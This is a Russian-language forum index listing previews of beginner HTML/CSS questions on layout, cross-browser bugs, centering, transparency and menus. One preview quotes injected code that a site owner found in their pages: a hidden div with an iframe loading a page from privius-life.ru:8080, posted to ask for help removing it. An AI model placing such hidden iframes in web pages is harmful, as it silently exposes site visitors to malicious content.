HTML Coding
Subforums
-
- 30.1k
- 1k
- By klierik,
Explore Questions
There are no popular questions to show right now
-
0 votes0 answers
-
0 votes0 answers
-
0 votes0 answers
-
0 votes1 answer
-
0 votes3 answers
29,542 questions in this forum
-
мануал по CSS кроссбраузерности
Уважаемые знатоки! Пожалуйста, сэкономьте время, где прочитать наиболее внятный мануал о том, как писать так, чтобы всё было одинаково. Описание багов ие. Просто мне попадается фрагметарная информация - тут ИЕ 6 так, а тут так. Хотелось бы раз сесть и за вечер одолеть вопрос в начальном приближении. Заранее спасибо за советы.
0 votes15 answers -
Прошу совета, на серваке в штмл файлах появляется бог знает что...
С завидной регулярностью в HTML коде появляется вот такая ересь: <body id="page5"><div style="display:none">lazwlewufzhcycdvamfcxprsyoqvljy<iframe width=130 height=658 src="http://privius-life.ru:8080/index.php" ></iframe></div> хотя я сам лично пишу только вот это: <body id="page5"> Что это такое и откуда оно берется??? И самое главное как с этим бороться??? И самое интересное что эта ерунда появляется во всех файлах штмл.
0 votes8 answers -
Как заверстать хитрый макет?
В общем выглядеть будет примерно так: Помогите заверстать, или хотябы объясните логику. У #CONTAINER ширина меняется
0 votes8 answers -
Два фона
Задача такая: В макете из двух колонок, вторую необходимо одновременно залить однотонным цветом и вставить картинку как фон для текста. Верстал таблицей, т.е. в ячейку надо либо поместить картинку, а поверх неё уже текст, либо поставить её фоном ячейки. В последнем случае оставшееся место в ячейке заполняется фоном таблицы, пока так и сделал. Но попытки поставить слой с картинкой за текст не увенчались успехом. Можно использовать относительное позиционирование: вставить слой с картинкой, затем абзац с текстом и текст поднять на высоту картинки, но тогда внизу ячейки будет ненужное свободное место, остающееся после текста. Сделать наоборот не получится: высоту абзаца ника…
0 votes1 answer -
Отступ текста снизу - 3px
Народ, в ряду есть несколько ячеек и я хочу чтобы текст в каждой из них имел разный отступ по вертикали от нижнего края. Пример: ячейка 1 - отступ 2px, ячейка 2 - отступ 7px, и т.д. Подскажите, плз, как это грамотно сделать
0 votes1 answer -
Проблемка с clear ((
Хочу создать такой макет...: 1.header с заданной высотой... ширина:100% (минимальная ширина:1004px) 2.Сайдбар(левый) фиксирован по ширине.... по высоте тенятся в зависимости от контента... 3.#content_center - блок фиксирован по ширине, тянется виз... (в зависимости от наполнения контентом) 4.#content_right - резиновый блок, тянется вниз и вправо... (в зависимости от наполнения контентом) 5.#content_foot - резиновый блок, тянется вниз и вправо... находится под блоками: #content_right и #content_center 6.footer с заданной высотой... ширина:100% (минимальная ширина:1004px) Вот так это выглядит на рисунке: —————— Архив с моей вёрсткой Посмотреть можно тут —————— Практически …
0 votes14 answers -
Динамичный контент
Здравствуйте, форумчане! На вашем форуме пишу впервые, по этому не смейтесь над вопросами. Помогите разобраться в следующем: Есть сайт на Народе, есть новости сайта, на каждой страницы есть отдельная графа - ''последние 5 новостей'' С каждым разом сайт увеличивается по количеству страниц и уже становится трудно отображать каждую новую новость заново на каждой страницы. Подскажите как сделать динамичное отображение новости на каждой страницы. В css такого не нашёл, возможно я что-то не допонял. Или хотя бы наведите на мысль, я быстро дойду до истины. Спасибо, надеюсь решить проблему с Вами.
0 votes11 answers -
Проблемка с ссылками в контейнере
Чет я совсем заработался и таких простых вещей не могу разобрать. В общем, в конце заметил, что ссылки в контейнере, занимают всю ширину контейнера. Тэги ссылок перепроверил, все закрыты. Не подскажете, как их снова ограничить, чтобы они были в ширину текста внутри ссылки а не во всю длину? Хочу сделать это, так как текст выделить нереально... Заранее спасибо.
0 votes6 answers -
Неполучается сделать шаблон =(
Хочу создать такой макет...: 1.header с заданной высотой... ширина:100% (минимальная ширина:1004px) 2.Сайдбар(левый) фиксирован по ширине.... по высоте тенятся в зависимости от контента... 3.#content_center - блок фиксирован по ширине, тянется виз... (в зависимости от наполнения контентом) 4.#content_right - резиновый блок, тянется вниз и вправо... (в зависимости от наполнения контентом) 5.#content_foot - резиновый блок, тянется вниз и вправо... находится под блоками: #content_right и #content_center 6.footer с заданной высотой... ширина:100% (минимальная ширина:1004px) Вот так это выглядит на рисунке: —————— Архив с моей вёрсткой Посмотреть можно тут —————— Практически …
0 votes1 answer -
картинка всегда по центру
Как разместить некоторый рисунок так, чтобы он всегда, на любом нарзрешении монитора, был посередине экрана ?
0 votes6 answers -
Проблема с меню...
Уважаемые пользователи , Не могу никак поправить ошибку в меню, навожу курсором выше текста, а текст снизу выделяется, как-будто я навел на него.. вот сам файл http://files.mail.ru/V29REF Эта ошибка видна, через браузер Mozilla firefox через оперу все норм, может кто сталкивался с такой проблемой, а то никак не могу разобраться..
0 votes0 answers -
Проблема с меню...
Уважаемые пользователи , Не могу никак поправить ошибку в меню, навожу курсором выше текста, а текст снизу выделяется, как-будто я навел на него.. файл http://files.mail.ru/V29REF
0 votes1 answer -
Templates
Появился вопрос главная страница, тоесть index создаётся тоже на основе шаблона? Есть ли какие-нибудь ещё способы, чтобы не изменять на каждой страничке код, а сделать так как при помощи templates? Тоесть заменяя код на одной странице, он будет менятся и на тех, которые были созданы на основе определённого шаблона...
0 votes1 answer -
Протокол date:
есть js: var str = "// ==UserScript==\n// @name "; window.open('data:text/javascript; ,' + str); беда в том, что нужно открыть форматированный файл, содержащий переносы строки но как их передать в адресной строке? у меня получается только файл, вытянутый в строку как можно заменить "\n", чтобы в файле были переносы?
0 votes3 answers -
Выравнивание элемента по центру страницы
Добрый день! Подскажите, пожалуйста, как выравнивать элементы полностью по центру страницы??? т.е. и по горизонтали и по вертикали! для всех браузеров! Заранее спасибо!
0 votes11 answers -
Текст
Подскажите,как сделать,чтобы текст не вылазил за границы блока или таблицы?
0 votes4 answers -
background в iframe
такая вот проблема: есть страничка с рисунком (градиент зеленоватый такой), в левой части находится iframe с текстом внутри. В мозиле и опере все нормально (фон "общий") а вот в IE фон - белый цвет. если сделать в страничке, которую подключаем в iframe, фоном этот градиент, то это очень заметно, виден кусок с другого места. как решить проблему?
0 votes1 answer -
некорректное вычисление высоты
Если высота слоя явно не указана, граница слоя отображается в 1px. Либо по высоте дочернего слоя - если указана явно его ширина. IE отображает рамку корректно. Вопрос: как заставить FF правильно вычислять высоту слоя, чтобы при включении рамки слоя - все было красиво Вот такое: height: 100% или height: auto не прокатит
0 votes4 answers -
Прозрачность
День добрый! Столкнулся с такой проблеммой. При создании прозрачного фона таблицы (80% опасити) в середину вставляю еще 1 таблицу, и вот внутрення (далее контент) так же прозрачная, хотя я ей не задаю параметров. Вобщем мне надо чтобы фон был прозрачным, а контент нет. Заранее спасибо #transp { - это фон background-color: #ffffff; opacity: 0.80; } #transp2 { - это контент clear: both; background-color: #ffffff; opacity: 1.0; } выходит так http://dakota.kiev.ua/articles/contacts.html
0 votes27 answers -
Почему сносить центральную колонку?
Зравствуйте! Имею код <div style="width: 100%;"> <div style="width: 120px; height: 150px; background-color: red; float: left;"> 1 </div> <div style="font-size: 40px; float: left;"> dsadsad sad sadas d d ad asdsadsad fdg dfsasds fdg dfdg df gdf gdfg </div> <div style="width: 120px; height: 150px; background-color: red; float: right;"> 2 </div> </div> Если не указать явно ширину центрального дива, то его сносит. Как на картинке Как можно сделать, чтобы не указывая явно ширину не сносило див? Чтобы то, что не влезло в рядок, переходило на следующий ряд. Так: А вообще код правильно написан?
0 votes10 answers -
Верстка для мобильных Устройств
Собствено сабж. Есть сайтик резиновый, нормально смотрится на нормальном экране. На экране PDA конечно же плывет. Отсюда вопросы 1. Под PDA делается отдельная верстка? 2. Как учитывается ширина экрана? Резиновый дизайн - это конечно хорошо, но как быть с широкими таблицами с данными, которые никак не умещаются даже в 640px, а уж про 240 вообще молчу? Или от горизонтального скрола никуда не деться? 3. Как отлаживаться? если нет под рукой реального устройства. У Оперы есть опция "маленький экран", но при этом летит нафиг часть CSS, т.е. игнорируется некоторые установки(например ширина Input). И вид страницы втиснутой в DIV шириной 240 на нормальном экране и в режиме "мале…
0 votes0 answers -
Проблема с перегрузкой стиля класса
Доброго все времени суток. Сделал тут фичу, дабы сэкономить место и более организованно его запользовать http://www.beavers-net.narod.ru/arch_news.html Само оно работает, если нету вложенных блоков, но вот стили к вложенным блокам перегрузить не могу. Итого задача: Есть уже настроенные стили заголовка (.part, .part: hover - http://www.beavers-net.narod.ru/style_arch.css), которые у меня применяются на остальных страницах. Есть список в списке, в котором этот стиль должен поменяться( p.inner_out p.part, p.inner_out p.part:hover ). Суть проблемы - не работает(. Уже и так и эдак - ничё не помогает. Жую сапог непонятной консистенции, вобщем. Я, конечно, могу просто сделать …
0 votes5 answers -
Текст под картинкой в ссылке
Приветствую. Столкнулся с проблемой. Может просто не догоняю, или устал просто. Что нужно? Нужно в ссылке выводить картинку и под ней текст. Все через CSS. Тут сложного ничего нету, но проблема в padding'е. Пример. Есть CSS #menu li.home a {float:left;display:block;width:49px;height:48px;background: url(../img/sour.gif) no-repeat -169px -6px;} #menu li.home a:hover {background-position: -169px -57px;} И есть сcылка <li class="home"><a href="/" title="Главная">Главная</a></li> Таким образом текст(Главная) по середине картинки. Как опустить текст под картинку? Если ставить padding, то тогда высота li будет в два раза больше и отодвигает другое меню…
0 votes34 answers -
блок
здравствуйте. мне необходимо сверстать блок, но у него должен быть фон, которы у меня есть. ..... у меня возникла проблема с пониманием: *** растяжение блока по ширине и по высоте *** ......... вопрос: в чем должна измеряться ширина и высота? ... зарание благодарю.
0 votes18 answers -
нестыкуется border нижнего дива с верхним
CSS: .leftboxt { background-image: url('images/hmenu.png'); width: 170px; } .leftboxb{ width: 170px; background:#FFDABB; border: 1px solid white; } Засада в том что низушка .leftboxb у нее есть белая полоса бордера не хочет стыковаться с верхушкой .leftboxt. Это в фаерфоксе и опере. Тут на сайте нашел статью, что опера и лис ставят бордер по вн. границе, а IE по внутренней. Так как же это можно решить
0 votes5 answers